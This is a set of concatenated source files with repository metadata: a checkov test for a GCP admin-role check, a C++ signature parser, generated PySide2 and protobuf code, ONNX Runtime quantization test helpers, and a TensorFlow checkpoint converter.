UTF-8
|
Python
| false
| false
| 1,305
|
py
|
test_GoogleProjectAdminServiceAccount.py
|
import unittest
import hcl2
from checkov.terraform.checks.resource.gcp.GoogleProjectAdminServiceAccount import check
from checkov.common.models.enums import CheckResult
class TestGoogleProjectAdminServiceAccount(unittest.TestCase):
def test_failure(self):
hcl_res = hcl2.loads("""
resource "google_project_iam_member" "project" {
project = "your-project-id"
role = "roles/owner"
member = "user:test@example-project.iam.gserviceaccount.com"
}
""")
resource_conf = hcl_res['resource'][0]['google_project_iam_member']['project']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.FAILED, scan_result)
def test_success(self):
hcl_res = hcl2.loads("""
resource "google_project_iam_member" "project" {
project = "your-project-id"
role = "roles/editor"
member = "user:jane@example.com"
}
""")
resource_conf = hcl_res['resource'][0]['google_project_iam_member']['project']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.PASSED, scan_result)
if __name__ == '__main__':
unittest.main()
|
5a7123c8e76a718015e5838254900d3e8188c644
|
fba68a71f9f7d4a2bf49136cdb315fc8258f65e7
|
/kengine/render/polyvox/libs/polyvox/documentation/_extensions/sphinxcontrib/parsing.py
|
a110e0674dc3470f5339f9445691db6997e38b5b
|
[
"MIT",
"BSD-2-Clause"
] |
permissive
|
phisko/kengine
|
a434e66aaa025b95596a6a72c002aba5ba09d75e
|
5a0ad085cdefaffe56e2b049e9772ac7a2d05d15
|
refs/heads/main
| 2023-08-08T05:49:40.621314
| 2023-03-10T10:26:39
| 2023-03-10T12:07:20
| 89,867,048
| 372
| 22
|
MIT
| 2023-03-10T12:07:21
| 2017-04-30T17:50:30
|
C++
|
UTF-8
|
Python
| false
| false
| 6,520
|
py
|
parsing.py
|
#import multiprocessing
import itertools
from pyparsing import Word, Literal, alphas, nums, alphanums, OneOrMore, Optional, SkipTo, ParseException, Group, ZeroOrMore, Suppress, Combine, delimitedList, quotedString, nestedExpr, ParseResults, oneOf
# define punctuation - reuse of expressions helps packratting work better
LPAR,RPAR,LBRACK,RBRACK,COMMA,EQ = map(Literal,"()[],=")
#Qualifier to go in front of type in the argument list (unsigned const int foo)
qualifier = OneOrMore(oneOf('const unsigned typename struct enum'))
def turn_parseresults_to_list(s, loc, toks):
return ParseResults(normalise_templates(toks[0].asList()))
def normalise_templates(toks, isinstance=isinstance, basestring=basestring):
s_list = ['<']
s_list_append = s_list.append #lookup append func once, instead of many times
for tok in toks:
if isinstance(tok, basestring): #See if it's a string
s_list_append(' ' + tok)
else:
#If it's not a string
s_list_append(normalise_templates(tok))
s_list_append(' >')
return ''.join(s_list)
#Skip pairs of brackets.
angle_bracket_pair = nestedExpr(opener='<',closer='>').setParseAction(turn_parseresults_to_list)
#TODO Fix for nesting brackets
parentheses_pair = LPAR + SkipTo(RPAR) + RPAR
square_bracket_pair = LBRACK + SkipTo(RBRACK) + RBRACK
#The raw type of the input, i.e. 'int' in (unsigned const int * foo)
#TODO I guess this should be a delimited list (by '::') of name and angle brackets
input_type = Combine(Word(alphanums + ':_') + Optional(angle_bracket_pair + Optional(Word(alphanums + ':_'))))
#A number. e.g. -1, 3.6 or 5
number = Word('-.' + nums)
#The name of the argument. We will ignore this but it must be matched anyway.
input_name = OneOrMore(Word(alphanums + '_') | angle_bracket_pair | parentheses_pair | square_bracket_pair)
#Grab the '&', '*' or '**' type bit in (const QString & foo, int ** bar)
pointer_or_reference = oneOf('* &')
#The '=QString()' or '=false' bit in (int foo = 4, bool bar = false)
default_value = Literal('=') + OneOrMore(number | quotedString | input_type | parentheses_pair | angle_bracket_pair | square_bracket_pair | Word('|&^'))
#A combination building up the interesting bit -- the argument type, e.g. 'const QString &', 'int' or 'char*'
argument_type = Optional(qualifier, default='')("qualifier") + \
input_type("input_type") + \
Optional(pointer_or_reference, default='')("pointer_or_reference1") + \
Optional('const')('const_pointer_or_reference') + \
Optional(pointer_or_reference, default='')("pointer_or_reference2")
#Argument + variable name + default
argument = Group(argument_type('argument_type') + Optional(input_name) + Optional(default_value))
#List of arguments in parentheses with an optional 'const' on the end
arglist = LPAR + delimitedList(argument)('arg_list') + Optional(COMMA + '...')('var_args') + RPAR
def normalise(symbol):
"""
    Takes a C++ symbol or function and splits it into symbol and a normalised argument list.
:Parameters:
symbol : string
A C++ symbol or function definition like ``PolyVox::Volume``, ``Volume::printAll() const``
:return:
a tuple consisting of two strings: ``(qualified function name or symbol, normalised argument list)``
"""
try:
bracket_location = symbol.index('(')
#Split the input string into everything before the opening bracket and everything else
function_name = symbol[:bracket_location]
arglist_input_string = symbol[bracket_location:]
except ValueError:
#If there's no brackets, then there's no function signature. This means the passed in symbol is just a type name
return symbol, ''
#This is a very common signature so we'll make a special case for it. It requires no parsing anyway
if arglist_input_string.startswith('()'):
if arglist_input_string in ('()', '()=0'):
return function_name, arglist_input_string
elif arglist_input_string in ('() const ', '() const', '() const =0'):
return function_name, '() const'
#By now we're left with something like "(blah, blah)", "(blah, blah) const" or "(blah, blah) const =0"
try:
closing_bracket_location = arglist_input_string.rindex(')')
arglist_suffix = arglist_input_string[closing_bracket_location+1:]
arglist_input_string = arglist_input_string[:closing_bracket_location+1]
except ValueError:
#This shouldn't happen.
print('Could not find closing bracket in %s' % arglist_input_string)
raise
try:
result = arglist.parseString(arglist_input_string)
except ParseException as error:
#print symbol
#print pe
return str(error), None
else:
#Will be a list or normalised string arguments
#e.g. ['OBMol&', 'vector< int >&', 'OBBitVec&', 'OBBitVec&', 'int', 'int']
normalised_arg_list = []
#Cycle through all the matched arguments
for arg in result.arg_list:
#Here is where we build up our normalised form of the argument
argument_string_list = ['']
if arg.qualifier:
argument_string_list.append(''.join((arg.qualifier,' ')))
argument_string_list.append(arg.input_type)
            #Functions can have a funny combination of *, & and const between the type and the name so build up a list of those here:
const_pointer_ref_list = []
const_pointer_ref_list.append(arg.pointer_or_reference1)
if arg.const_pointer_or_reference:
const_pointer_ref_list.append(''.join((' ', arg.const_pointer_or_reference, ' ')))
# same here
const_pointer_ref_list.append(arg.pointer_or_reference2)
#And combine them into a single normalised string and add them to the argument list
argument_string_list.extend(const_pointer_ref_list)
#Finally we join our argument string and add it to our list
normalised_arg_list.append(''.join(argument_string_list))
#If the function contains a variable number of arguments (int foo, ...) then add them on.
if result.var_args:
normalised_arg_list.append('...')
#Combine all the arguments and put parentheses around it
normalised_arg_list_string = ''.join(['(', ', '.join(normalised_arg_list), ')'])
#Add a const onto the end
if 'const' in arglist_suffix:
normalised_arg_list_string += ' const'
return function_name, normalised_arg_list_string
#TODO Maybe this should raise an exception?
return None
def normalise_list(list_of_symbols):
#normalise_pool = multiprocessing.Pool(multiprocessing.cpu_count() * 2)
#results = normalise_pool.map(normalise, list_of_symbols)
#normalise_pool.terminate()
results = itertools.imap(normalise, list_of_symbols)
return results
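# --- Usage sketch (not part of the original Python 2 module) ---
# Hedged examples of what normalise() returns, taken from the docstring above:
# a plain symbol passes through unchanged, and a no-argument const method hits
# the fast path that keeps '() const' as the normalised argument list.
def _demo_normalise():
    assert normalise("PolyVox::Volume") == ("PolyVox::Volume", "")
    assert normalise("Volume::printAll() const") == ("Volume::printAll", "() const")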
|
c0f18b2c1d20a4d93076f727110a3e501c403825
|
82d65bb050149ee5b3a5995dedf3a233f2dabba4
|
/Eve/tools/pm/ui/ui_pm_add_sequence.py
|
09daafd11fdf1649ba8fa4661a2af43f23b61f96
|
[] |
no_license
|
kiryha/Houdini
|
d2271987b03b4abc739236fd4544a8ff5e1519dd
|
4e58b79e5992dc4fb4e73e44cd2a7e0522420d15
|
refs/heads/master
| 2022-12-14T02:54:38.519360
| 2022-12-06T00:48:31
| 2022-12-06T00:48:31
| 121,566,961
| 668
| 120
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,466
|
py
|
ui_pm_add_sequence.py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'E:\Eve\Eve\tools\pm\ui\ui_pm_add_sequence.ui',
# licensing of 'E:\Eve\Eve\tools\pm\ui\ui_pm_add_sequence.ui' applies.
#
# Created: Wed Feb 05 11:57:12 2020
# by: pyside2-uic running on PySide2 5.9.0a1.dev1528389443
#
# WARNING! All changes made in this file will be lost!
from PySide2 import QtCore, QtGui, QtWidgets
class Ui_AddSequence(object):
def setupUi(self, AddSequence):
AddSequence.setObjectName("AddSequence")
AddSequence.resize(370, 89)
self.verticalLayout = QtWidgets.QVBoxLayout(AddSequence)
self.verticalLayout.setObjectName("verticalLayout")
self.layoutSequence = QtWidgets.QVBoxLayout()
self.layoutSequence.setObjectName("layoutSequence")
self.verticalLayout.addLayout(self.layoutSequence)
self.btnAddSequence = QtWidgets.QPushButton(AddSequence)
self.btnAddSequence.setMinimumSize(QtCore.QSize(0, 40))
self.btnAddSequence.setObjectName("btnAddSequence")
self.verticalLayout.addWidget(self.btnAddSequence)
self.retranslateUi(AddSequence)
QtCore.QMetaObject.connectSlotsByName(AddSequence)
def retranslateUi(self, AddSequence):
AddSequence.setWindowTitle(QtWidgets.QApplication.translate("AddSequence", "Add Sequence", None, -1))
self.btnAddSequence.setText(QtWidgets.QApplication.translate("AddSequence", "Add Sequence", None, -1))
|
6b506339b41573e31364a09fa7bef5f778fd82a1
|
ea57d267ab31480d8d731b2c095e9da9ad989133
|
/packages/fetchai/protocols/aggregation/aggregation_pb2.py
|
e46ed141e6d6432f55e1d005f9b96ae3bc81c640
|
[
"Apache-2.0"
] |
permissive
|
fetchai/agents-aea
|
6d034f1db6f3beacf31dac2f5a1baaa60c8edb7d
|
bec49adaeba661d8d0f03ac9935dc89f39d95a0d
|
refs/heads/main
| 2023-08-08T23:19:06.276643
| 2023-02-04T10:46:39
| 2023-02-04T10:46:39
| 203,558,879
| 192
| 58
|
Apache-2.0
| 2023-07-19T04:45:26
| 2019-08-21T10:12:47
|
Python
|
UTF-8
|
Python
| false
| true
| 3,553
|
py
|
aggregation_pb2.py
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: aggregation.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import descriptor_pool as _descriptor_pool
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor_pool.Default().AddSerializedFile(
b'\n\x11\x61ggregation.proto\x12\x1e\x61\x65\x61.fetchai.aggregation.v0_2_7"\xaa\x03\n\x12\x41ggregationMessage\x12\x62\n\x0b\x61ggregation\x18\x05 \x01(\x0b\x32K.aea.fetchai.aggregation.v0_2_7.AggregationMessage.Aggregation_PerformativeH\x00\x12\x62\n\x0bobservation\x18\x06 \x01(\x0b\x32K.aea.fetchai.aggregation.v0_2_7.AggregationMessage.Observation_PerformativeH\x00\x1aZ\n\x18Observation_Performative\x12\r\n\x05value\x18\x01 \x01(\x03\x12\x0c\n\x04time\x18\x02 \x01(\t\x12\x0e\n\x06source\x18\x03 \x01(\t\x12\x11\n\tsignature\x18\x04 \x01(\t\x1a`\n\x18\x41ggregation_Performative\x12\r\n\x05value\x18\x01 \x01(\x03\x12\x0c\n\x04time\x18\x02 \x01(\t\x12\x14\n\x0c\x63ontributors\x18\x03 \x03(\t\x12\x11\n\tsignature\x18\x04 \x01(\tB\x0e\n\x0cperformativeb\x06proto3'
)
_AGGREGATIONMESSAGE = DESCRIPTOR.message_types_by_name["AggregationMessage"]
_AGGREGATIONMESSAGE_OBSERVATION_PERFORMATIVE = _AGGREGATIONMESSAGE.nested_types_by_name[
"Observation_Performative"
]
_AGGREGATIONMESSAGE_AGGREGATION_PERFORMATIVE = _AGGREGATIONMESSAGE.nested_types_by_name[
"Aggregation_Performative"
]
AggregationMessage = _reflection.GeneratedProtocolMessageType(
"AggregationMessage",
(_message.Message,),
{
"Observation_Performative": _reflection.GeneratedProtocolMessageType(
"Observation_Performative",
(_message.Message,),
{
"DESCRIPTOR": _AGGREGATIONMESSAGE_OBSERVATION_PERFORMATIVE,
"__module__": "aggregation_pb2"
# @@protoc_insertion_point(class_scope:aea.fetchai.aggregation.v0_2_7.AggregationMessage.Observation_Performative)
},
),
"Aggregation_Performative": _reflection.GeneratedProtocolMessageType(
"Aggregation_Performative",
(_message.Message,),
{
"DESCRIPTOR": _AGGREGATIONMESSAGE_AGGREGATION_PERFORMATIVE,
"__module__": "aggregation_pb2"
# @@protoc_insertion_point(class_scope:aea.fetchai.aggregation.v0_2_7.AggregationMessage.Aggregation_Performative)
},
),
"DESCRIPTOR": _AGGREGATIONMESSAGE,
"__module__": "aggregation_pb2"
# @@protoc_insertion_point(class_scope:aea.fetchai.aggregation.v0_2_7.AggregationMessage)
},
)
_sym_db.RegisterMessage(AggregationMessage)
_sym_db.RegisterMessage(AggregationMessage.Observation_Performative)
_sym_db.RegisterMessage(AggregationMessage.Aggregation_Performative)
if _descriptor._USE_C_DESCRIPTORS == False:
DESCRIPTOR._options = None
_AGGREGATIONMESSAGE._serialized_start = 54
_AGGREGATIONMESSAGE._serialized_end = 480
_AGGREGATIONMESSAGE_OBSERVATION_PERFORMATIVE._serialized_start = 276
_AGGREGATIONMESSAGE_OBSERVATION_PERFORMATIVE._serialized_end = 366
_AGGREGATIONMESSAGE_AGGREGATION_PERFORMATIVE._serialized_start = 368
_AGGREGATIONMESSAGE_AGGREGATION_PERFORMATIVE._serialized_end = 464
# @@protoc_insertion_point(module_scope)
|
7ccd8e198077ce01c5f066281ed112895523b6dc
|
0f2b08b31fab269c77d4b14240b8746a3ba17d5e
|
/onnxruntime/test/python/quantization/op_test_utils.py
|
e94ac5c9615836b9f850b8ac13f9750238234bfb
|
[
"MIT"
] |
permissive
|
microsoft/onnxruntime
|
f75aa499496f4d0a07ab68ffa589d06f83b7db1d
|
5e747071be882efd6b54d7a7421042e68dcd6aff
|
refs/heads/main
| 2023-09-04T03:14:50.888927
| 2023-09-02T07:16:28
| 2023-09-02T07:16:28
| 156,939,672
| 9,912
| 2,451
|
MIT
| 2023-09-14T21:22:46
| 2018-11-10T02:22:53
|
C++
|
UTF-8
|
Python
| false
| false
| 17,361
|
py
|
op_test_utils.py
|
import uuid
from pathlib import Path
import numpy as np
import onnx
from onnx import TensorProto
from onnx.helper import float32_to_float8e4m3, np_dtype_to_tensor_dtype
from onnx.numpy_helper import float8e4m3_to_float32
from onnx.reference import ReferenceEvaluator
from onnx.reference import ops as onnx_ops
from onnx.reference.custom_element_types import float8e4m3fn, float8e4m3fnuz, float8e5m2, float8e5m2fnuz
from onnx.reference.op_run import OpRun
import onnxruntime
from onnxruntime.quantization import CalibrationDataReader
onnx_recent_enough = hasattr(OpRun, "infer_name")
if onnx_recent_enough:
# Test with ReferenceEvaluator requires PR https://github.com/onnx/onnx/pull/5408/.
# https://github.com/onnx/onnx/pull/5408
try:
from onnx.reference.op_run import to_array_extended
except ImportError:
to_array_extended = None
onnx_recent_enough = False
class QGemm(OpRun):
op_domain = "com.microsoft"
f8_types = {
TensorProto.FLOAT8E4M3FN,
TensorProto.FLOAT8E4M3FNUZ,
TensorProto.FLOAT8E5M2,
TensorProto.FLOAT8E5M2FNUZ,
}
def get_tensor_type(self, tensor: np.ndarray) -> int:
if tensor.dtype == float8e4m3fn and tensor.dtype.descr[0][0] == "e4m3fn":
return TensorProto.FLOAT8E4M3FN
if tensor.dtype == float8e4m3fnuz and tensor.dtype.descr[0][0] == "e4m3fnuz":
return TensorProto.FLOAT8E4M3FNUZ
if tensor.dtype == float8e5m2 and tensor.dtype.descr[0][0] == "e5m2":
return TensorProto.FLOAT8E5M2
if tensor.dtype == float8e5m2fnuz and tensor.dtype.descr[0][0] == "e5m2fnuz":
return TensorProto.FLOAT8E5M2FNUZ
return np_dtype_to_tensor_dtype(tensor.dtype)
def _run(
self,
A,
a_scale,
a_zero_point,
B,
b_scale,
b_zero_point,
C=None,
y_scale=None,
y_zero_point=None,
transA=0,
transB=0,
alpha=1.0,
):
if transA:
A = A.T
if transB:
B = B.T
a_type = self.get_tensor_type(a_zero_point)
b_type = self.get_tensor_type(b_zero_point)
y_type = self.get_tensor_type(y_zero_point)
if a_type == TensorProto.FLOAT8E4M3FN and b_type == TensorProto.FLOAT8E4M3FN:
a_scaled = (float8e4m3_to_float32(A).astype(float) - float8e4m3_to_float32(a_zero_point)) * np.float32(
a_scale
)
b_scaled = (float8e4m3_to_float32(B).astype(float) - float8e4m3_to_float32(b_zero_point)) * np.float32(
b_scale
)
y = a_scaled @ b_scaled * np.float32(alpha)
if C is not None:
dtype = self.get_tensor_type(C)
if dtype not in (TensorProto.FLOAT, TensorProto.FLOAT16):
raise TypeError(f"C.dtype must be float16 or float 32 not {dtype}.")
y += C.astype(np.float32)
if y_scale is not None:
y /= y_scale
if y_zero_point is not None:
y += float8e4m3_to_float32(y_zero_point)
ry = y.ravel()
fy = np.empty(ry.shape, dtype=float8e4m3fn)
for i in range(fy.shape[0]):
el = float32_to_float8e4m3(ry[i]) # type: ignore[assignment]
fy[i] = el
y = fy.reshape(y.shape)
else:
raise NotImplementedError("y_zero_point is not empty. QGemm is not implemented in that case.")
return (y,)
elif a_type in self.f8_types or b_type in self.f8_types or y_type in self.f8_types:
raise NotImplementedError(f"QGemm not implemented for zero_types {a_type}, {b_type}, {y_type}.")
else:
if TensorProto.FLOAT8E4M3FN in {a_type, b_type, y_type}:
raise TypeError(f"Unexpected type for A: {dtype}, B:{dtype} or Y:{dtype}.")
a_scaled = (A.astype(float) - a_zero_point) * np.float32(a_scale)
b_scaled = (B.astype(float) - b_zero_point) * np.float32(b_scale)
y = a_scaled @ b_scaled * np.float32(alpha)
if C is not None:
y += C * np.float32(a_scale) * np.float32(b_scale)
if y_scale is not None:
y /= np.float32(y_scale)
if y_zero_point is not None:
y += y_zero_point
if y_zero_point is not None:
dtype = y_zero_point.dtype
elif C is not None:
dtype = C.dtype
else:
dtype = A.dtype
y = np.rint(y)
if dtype == np.uint8:
y = np.clip(y, 0, 255)
elif dtype == np.int8:
y = np.clip(y, -128, 127)
else:
raise ValueError(f"Unexpected dtype={dtype}, it should be uint8 or int8.")
return (y.astype(dtype),)
class TestDataFeeds(CalibrationDataReader):
def __init__(self, data_feeds):
"""
parameter data_feeds: list of input feed, each input feed is diction of {input_name: np_array}
"""
self.data_feeds = data_feeds
self.iter_next = iter(self.data_feeds)
def get_next(self):
return next(self.iter_next, None)
def rewind(self):
self.iter_next = iter(self.data_feeds)
def input_feeds_neg_one_zero_one(n, name2shape):
"""
randomize n feed according to shape, its values are from -1, 0, and 1
"""
input_data_list = []
for _i in range(n):
inputs = {}
for name, shape in name2shape.items():
inputs.update({name: np.random.randint(-1, 2, shape).astype(np.float32)})
input_data_list.extend([inputs])
dr = TestDataFeeds(input_data_list)
return dr
def check_op_type_order(testcase, model_to_check, ops):
if isinstance(model_to_check, str):
model = onnx.load(model_to_check)
elif isinstance(model_to_check, onnx.ModelProto):
model = model_to_check
testcase.assertEqual(len(ops), len(model.graph.node), "op count is not same")
for node_idx, node in enumerate(model.graph.node):
testcase.assertEqual(
ops[node_idx],
node.op_type,
f"op {node_idx} is not in order. Expected: {ops[node_idx]}, Actual: {node.op_type}",
)
def check_op_type_count(testcase, model_path, **kwargs):
model = onnx.load(Path(model_path))
optype2count = {}
for op_type in kwargs:
optype2count[op_type] = 0
for node in model.graph.node:
if node.op_type in optype2count:
optype2count[node.op_type] += 1
for op_type in kwargs:
testcase.assertEqual(
kwargs[op_type],
optype2count[op_type],
f"op_type {op_type} count not same",
)
def check_sign_f8_quantization(model_path_origin, model_path_to_check):
"""
Quantization to float 8 type does not change the sign as zero_point is always null.
This function checks that the quantized parameters did not change.
"""
with open(model_path_origin, "rb") as f:
model = onnx.load(f)
names = {init.name: init for init in model.graph.initializer}
with open(model_path_to_check, "rb") as f:
model_f8 = onnx.load(f)
names_f8 = {init.name: init for init in model_f8.graph.initializer}
for init in model_f8.graph.initializer:
if not init.name.endswith("_quantized"):
continue
name = init.name.replace("_quantized", "")
if name not in names:
raise AssertionError(f"Unable to find {name!r} in {set(names)}.")
scale_zp = [i.name for i in model_f8.graph.initializer if i.name.startswith(name)]
if len(scale_zp) not in (1, 3):
raise AssertionError(
f"Need one or three names not {scale_zp}, all names: {set(i.name for i in model_f8.graph.initializer)}."
)
scale = [name for name in scale_zp if "scale" in name]
zero = [name for name in scale_zp if "zero" in name]
if len(scale_zp) == 3:
if len(scale) != 1:
raise AssertionError(f"Need one name not {scale}.")
if len(zero) != 1:
raise AssertionError(f"Need one name not {zero}.")
else:
if len(scale) != 0:
raise AssertionError(f"No scale is expected but has {scale}.")
if len(zero) != 0:
raise AssertionError(f"No zero is expected but has {zero}.")
expected_sign = onnx.numpy_helper.to_array(names[name]) >= 0
if "bias" in init.name:
if init.data_type >= 17:
raise AssertionError(f"bias {init.name!r} should be float 16 not {init.data_type}.")
continue
if init.data_type < 17:
raise AssertionError(f"Initializer {init.name!r} not a float 8 type.")
raw = np.array([int(i) for i in init.raw_data])
got_sign = raw <= 128
try:
np.testing.assert_allclose(expected_sign.ravel(), got_sign)
except AssertionError as e:
scale_value = onnx.numpy_helper.to_array(names_f8[scale[0]])
err_msg = f"Sign are different for {name!r}, scale={scale_value}."
if to_array_extended is not None:
values = onnx.numpy_helper.to_array(names[name]).flatten()
f8_values = to_array_extended(init)
zero = onnx_ops.op_cast.Cast_19.eval(np.array(0), to=init.data_type)
dq = onnx_ops.op_dequantize_linear.DequantizeLinear.eval(f8_values, scale_value, zero).flatten()
q = onnx_ops.op_quantize_linear.QuantizeLinear_19.eval(values, scale_value, zero).flatten()
qdq = onnx_ops.op_dequantize_linear.DequantizeLinear.eval(q, scale_value, zero).flatten()
err_msg = (
f"{err_msg}\nvalues={values[:20]}\nqu={f8_values.flatten()[:20]}"
f"\n{q.flatten()[:20]}\ndq={dq[:20]}\nqdq={qdq[:20]}"
)
raise AssertionError(err_msg) from e
def check_model_correctness(
testcase,
model_path_origin,
model_path_to_check,
inputs,
rtol=1e-2,
atol=0.05,
providers=None,
dynamic=False,
is_gemm=False,
):
if providers is None:
providers = ["CPUExecutionProvider"]
sess_options = onnxruntime.SessionOptions()
sess_options.graph_optimization_level = onnxruntime.GraphOptimizationLevel.ORT_DISABLE_ALL
sess_options.optimized_model_filepath = model_path_to_check + ".optimized.onnx"
origin_sess = onnxruntime.InferenceSession(model_path_origin, sess_options=sess_options, providers=providers)
origin_results = origin_sess.run(None, inputs)
with open(model_path_origin, "rb") as f:
model_onnx = onnx.load(f)
ops_set = set(node.op_type for node in model_onnx.graph.node)
check_reference_evaluator = not (ops_set & {"EmbedLayerNormalization", "Conv", "Attention", "Transpose"})
if check_reference_evaluator and onnx_recent_enough:
ref = ReferenceEvaluator(model_path_origin)
ref_origin_results = ref.run(None, inputs)
for idx, ref_output in enumerate(origin_results):
output = ref_origin_results[idx]
np.testing.assert_allclose(
ref_output,
output,
rtol=rtol,
atol=atol,
err_msg=f"Model {model_path_to_check!r} failed for providers={providers!r}.",
)
# Verifies the shapes in the quantized model.
if is_gemm:
expected_shapes = {}
with open(model_path_origin, "rb") as f:
model = onnx.load(f)
for init in model.graph.initializer:
expected_shapes[init.name] = tuple(init.dims)
checked = 0
f8_quantization = False
with open(model_path_to_check, "rb") as f:
model_check = onnx.load(f)
for init in model_check.graph.initializer:
if init.name.endswith("_quantized"):
name = init.name.replace("_quantized", "")
expected = expected_shapes[name]
shape = tuple(init.dims)
if not dynamic and expected != shape:
raise AssertionError(
f"Shape mismatch for initializer {init.name!r} from {init.name!r}, "
f"shape={shape} != {expected} (expected)."
)
else:
checked += 1
if "zero_point" in init.name:
dt = init.data_type
f8_quantization = f8_quantization or dt in (
TensorProto.FLOAT8E4M3FN,
TensorProto.FLOAT8E4M3FNUZ,
TensorProto.FLOAT8E5M2,
TensorProto.FLOAT8E5M2FNUZ,
)
if checked == 0:
raise AssertionError(
f"Unable to check expected shape, expected_shapes={expected_shapes}, "
f"names={[init.name for init in model_check.graph.initializer]}."
)
if f8_quantization:
check_sign_f8_quantization(model_path_origin, model_path_to_check)
# Verifies the expected outputs.
if check_reference_evaluator and onnx_recent_enough:
# Needs pv.Version(onnx.__version__) >= pv.Version("1.16.0")
ref = ReferenceEvaluator(model_path_to_check, new_ops=[QGemm])
target_results = ref.run(None, inputs)
testcase.assertEqual(len(origin_results), len(target_results), "result count are different")
for idx, ref_output in enumerate(origin_results):
output = target_results[idx]
np.testing.assert_allclose(
ref_output,
output,
rtol=rtol,
atol=atol,
err_msg=f"Model {model_path_to_check!r} failed for providers={providers!r}.",
)
# enable QDQ transformers
# sess_options.graph_optimization_level = onnxruntime.GraphOptimizationLevel.ORT_ENABLE_EXTENDED
target_sess = onnxruntime.InferenceSession(
model_path_to_check,
sess_options=sess_options,
providers=providers,
)
target_results = target_sess.run([], inputs)
testcase.assertEqual(len(origin_results), len(target_results), "result count are different")
for idx, ref_output in enumerate(origin_results):
output = target_results[idx]
np.testing.assert_allclose(
ref_output,
output,
rtol=rtol,
atol=atol,
err_msg=f"Model {model_path_to_check!r} failed for providers={providers!r}.",
)
def check_op_nodes(testcase, model_path, node_checker):
model = onnx.load(Path(model_path))
for node in model.graph.node:
testcase.assertTrue(node_checker(node))
def check_qtype_by_node_type(testcase, model_to_check, check_list):
if isinstance(model_to_check, str):
model = onnx.load(model_to_check)
elif isinstance(model_to_check, onnx.ModelProto):
model = model_to_check
model = onnx.shape_inference.infer_shapes(model)
value_infos = {vi.name: vi for vi in model.graph.value_info}
value_infos.update({ot.name: ot for ot in model.graph.output})
value_infos.update({it.name: it for it in model.graph.input})
initializers = {init.name: init for init in model.graph.initializer}
for node in model.graph.node:
if node.op_type in check_list:
input_output_check_list = check_list[node.op_type]
for check_item in input_output_check_list:
tensor_name = node.input[check_item[1]] if check_item[0] == "i" else node.output[check_item[1]]
testcase.assertTrue((tensor_name in value_infos) or (tensor_name in initializers))
if tensor_name in value_infos:
vi = value_infos[tensor_name]
testcase.assertTrue(vi.type.HasField("tensor_type"))
testcase.assertTrue(vi.type.tensor_type.elem_type == check_item[2])
else: # if (tensor_name in initializers):
init = initializers[tensor_name]
testcase.assertEqual(init.data_type, check_item[2])
def create_clip_node(input_name, output_name, node_name, initializers, min_value=-1.0, max_value=1.0):
clip_min_name = str(uuid.uuid4())
clip_max_name = str(uuid.uuid4())
clip_inputs = [input_name, clip_min_name, clip_max_name]
clip_outputs = [output_name]
clip_name = node_name
initializers.append(onnx.numpy_helper.from_array(np.array(min_value, dtype=np.float32), name=clip_min_name))
initializers.append(onnx.numpy_helper.from_array(np.array(max_value, dtype=np.float32), name=clip_max_name))
return onnx.helper.make_node("Clip", clip_inputs, clip_outputs, name=clip_name)
def generate_random_initializer(initializer_name, tensor_shape, tensor_dtype, mean=0.0, dev=0.3):
"""
Helper function to generate initializers for test inputs
"""
tensor = np.random.normal(mean, dev, tensor_shape).astype(tensor_dtype)
init = onnx.numpy_helper.from_array(tensor, initializer_name)
return init
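# Hedged usage sketch (not part of the original utilities): shows how the two
# helpers above could be combined into a tiny ONNX graph. All tensor and node
# names below are made up for illustration.
#
# initializers = []
# clip_node = create_clip_node("X", "Y", "clip0", initializers, min_value=-6.0, max_value=6.0)
# initializers.append(generate_random_initializer("W", (4, 4), np.float32))
# graph = onnx.helper.make_graph(
#     [clip_node],
#     "clip_example",
#     [onnx.helper.make_tensor_value_info("X", TensorProto.FLOAT, [4, 4])],
#     [onnx.helper.make_tensor_value_info("Y", TensorProto.FLOAT, [4, 4])],
#     initializer=initializers,
# )
# model = onnx.helper.make_model(graph)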
|
dc35edc0e918238f3d78b3a3d0f25eb02971dea0
|
4ff11364a6dc59bd6bf7fb4efd868c7e45b1caab
|
/calamari_ocr/ocr/savedmodel/migrations/loadweights.py
|
87fcf504650453e7553603e58657e46955da88ed
|
[
"Apache-2.0"
] |
permissive
|
Calamari-OCR/calamari
|
6cf29512e71025b90807462b452595abe94cb8f3
|
2f71b7eb08339d25ccb21d80c1d5b851f3d5bdaa
|
refs/heads/master
| 2023-08-22T05:34:23.008839
| 2023-08-18T11:01:23
| 2023-08-18T11:01:23
| 126,039,059
| 1,019
| 245
|
Apache-2.0
| 2023-09-05T09:30:58
| 2018-03-20T15:22:29
|
Python
|
UTF-8
|
Python
| false
| false
| 1,426
|
py
|
loadweights.py
|
def load_and_convert_weights(ckpt, dry_run=True):
import tensorflow as tf
tf.compat.v1.reset_default_graph()
with tf.compat.v1.Session() as sess:
available_vars = tf.compat.v1.train.list_variables(ckpt)
available_var_names = [var_name for var_name, _ in available_vars]
for var_name in available_var_names:
var = tf.compat.v1.train.load_variable(ckpt, var_name)
# bias and kernel changed, unfortunately I do not know how to transform it...
if var_name.endswith("_lstm/kernel"):
rec_size = var.shape[1] // 4
# this split into recurrent kernel should be valid
kernel = var[:-rec_size]
rec_kernel = var[-rec_size:]
tf.Variable(kernel, name=var_name)
tf.Variable(rec_kernel, name=var_name.replace("kernel", "recurrent_kernel"))
elif var_name.endswith("_lstm/bias"):
# this might be required
dims = len(var) // 4
var[dims : dims * 2] += 1
tf.Variable(var, name=var_name)
else:
tf.Variable(var, name=var_name)
if not dry_run:
# Save the variables
saver = tf.compat.v1.train.Saver()
sess.run(tf.compat.v1.global_variables_initializer())
saver.save(sess, ckpt)
tf.compat.v1.reset_default_graph()
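# Hedged usage sketch (not part of the original module); the checkpoint path is
# hypothetical. A dry run only loads and re-creates the variables, while
# dry_run=False also saves the converted checkpoint back in place.
#
# load_and_convert_weights("models/old_calamari_model.ckpt", dry_run=True)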
|
6c3294301212b1fb9400e982b477916c07e18036
|
5105403f2b75990654519438d8ceabcf80962ebf
|
/src/bokeh/themes/_night_sky.py
|
